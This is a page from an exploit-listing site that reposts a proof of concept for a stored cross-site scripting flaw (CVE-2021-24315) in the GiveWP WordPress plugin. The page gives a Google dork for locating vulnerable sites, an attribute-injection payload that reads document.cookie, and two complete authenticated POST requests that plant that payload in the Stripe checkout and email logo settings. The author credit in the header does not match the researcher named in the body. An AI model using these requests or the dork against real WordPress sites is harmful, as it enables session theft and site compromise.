Advertisement






GiveWP WordPress Plugin < = 2.10.3 - Authenticated Persistent XSS

CVE Category Price Severity
CVE-2021-24315 CWE-79 Not specified High
Author Risk Exploitation Type Date
Seth Law (Pethical) High Remote 2021-05-17
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050095

Below is a copy:

GiveWP WordPress Plugin <= 2.10.3 - Authenticated Persistent XSS
/*!
- # VULNERABILITY: GiveWP WordPress Plugin <= 2.10.3 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/give/
- # DATE: 2021-04-02
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: GiveWP [ https://givewp.com ]
- # SOFTWARE VERSION: <= 2.10.3
- # SOFTWARE LINK: https://wordpress.org/plugins/give/
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
- # CVE: CVE-2021-24315
*/



### -- [ Info: ]

[i] An Authenticated Persistent XSS vulnerability was discovered in the GiveWP plugin through v2.10.3 for WordPress.

[i] Vulnerable parameter(s): &stripe_checkout_background_image=, &email_logo=.



### -- [ Impact: ]

[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



### -- [ Payloads: ]

[$] m0ze" autofocus onfocus=alert(document.cookie); "

[$] m0ze" autofocus onfocus=alert(document.domain); "



### -- [ PoC #1 | Authenticated Persistent XSS | Background Image (Stripe Checkout): ]

[!] POST /wp-admin/edit.php?post_type=give_forms&page=give-settings&tab=gateways&section=stripe-settings&group=checkout HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=---------------------------298112530519342307931729900289
Content-Length: 3549
Cookie: [admin cookies]

-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_statement_descriptor"

PoC by m0ze
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_cc_fields_format"

multi
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_checkout_type"

modal
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_checkout_name"

PoC by m0ze
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_checkout_background_image"

m0ze" autofocus onfocus=alert(document.cookie); "
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_hide_icon"

enabled
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_icon_style"

default
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_mandate_acceptance_option"

enabled
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_mandate_acceptance_text"

A refund must be claimed within 8 weeks starting from the date on which your account was debited.
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_becs_hide_icon"

enabled
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_becs_icon_style"

default
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_becs_mandate_acceptance_option"

enabled
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_becs_mandate_acceptance_text"

You certify that you are either an account holder or an authorized signatory on the account listed above.
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="_give-save-settings"

88a432b100
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/edit.php?post_type=give_forms&page=give-settings&tab=gateways&section=stripe-settings&group=checkout
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="save"

Save changes
-----------------------------298112530519342307931729900289--



### -- [ PoC #2 | Authenticated Persistent XSS | Logo (Email Settings): ]

[!] POST /wp-admin/edit.php?post_type=give_forms&page=give-settings&tab=emails&section=email-settings HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=---------------------------3829962343981723866336357850
Content-Length: 1077
Cookie: [admin cookies]

-----------------------------3829962343981723866336357850
Content-Disposition: form-data; name="email_template"

default
-----------------------------3829962343981723866336357850
Content-Disposition: form-data; name="email_logo"

m0ze" autofocus onfocus=alert(document.cookie); "
-----------------------------3829962343981723866336357850
Content-Disposition: form-data; name="from_name"

PoC by m0ze
-----------------------------3829962343981723866336357850
Content-Disposition: form-data; name="from_email"

[email protected]
-----------------------------3829962343981723866336357850
Content-Disposition: form-data; name="_give-save-settings"

88a432b100
-----------------------------3829962343981723866336357850
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/edit.php?post_type=give_forms&page=give-settings&tab=emails&section=email-settings
-----------------------------3829962343981723866336357850
Content-Disposition: form-data; name="save"

Save changes
-----------------------------3829962343981723866336357850--



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.